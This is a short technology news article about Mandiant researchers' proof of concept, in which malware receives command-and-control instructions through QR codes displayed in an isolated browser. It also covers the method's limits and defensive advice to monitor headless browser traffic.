QR codes can be used to crack this essential browser security tool
- Browser isolation runs all scripts in a remote or virtual environment, but QR codes still come through
- If a device is infected with malware, it can receive commands via QR codes, rendering browser isolation useless
- The method works, but has its limitations
Cybersecurity researchers at Mandiant claim to have discovered a new way to allow malware to communicate with its C2 servers through the browser, even when the browser is isolated in a sandbox.
There is a relatively new method of protecting against cyber attacks over the Internet called ‘browser isolation’. It causes the victim’s browser to communicate with another browser, which is located in a cloud environment or a virtual machine. Whatever commands the victim enters are passed to the remote browser, and all they get in return is the visual representation of the page. Code, scripts and commands all run on the remote device.
Think of it like scrolling through the lens of a phone camera.
Limits and disadvantages
But now Mandiant believes that C2 (command & control) servers can still talk to the malware on the infected device regardless of the inability to run code via the browser, and that is – via QR codes. If a computer is infected, the malware can read the pixels displayed on the screen. If it is a QR code, that is enough for the program to perform various actions.
Mandiant has prepared a proof-of-concept (PoC) showing how the method works on the latest version of Google Chrome, sending the malware via Cobalt Strike’s remote C2 feature.
The method works, but far from ideal, the researchers added. Because the data stream is limited to a maximum of 2,189 bytes and there is a latency of approximately 5 seconds, the method cannot be used to send large payloads or facilitate SOCKS proxying. Furthermore, additional security measures such as URL scanning or data loss prevention may make this method completely useless.
Still, there are ways in which the method can be abused to carry out destructive malware attacks. Therefore, IT teams are advised to still monitor traffic flow, especially from headless browsers running in automation mode.
Via BleepingComputer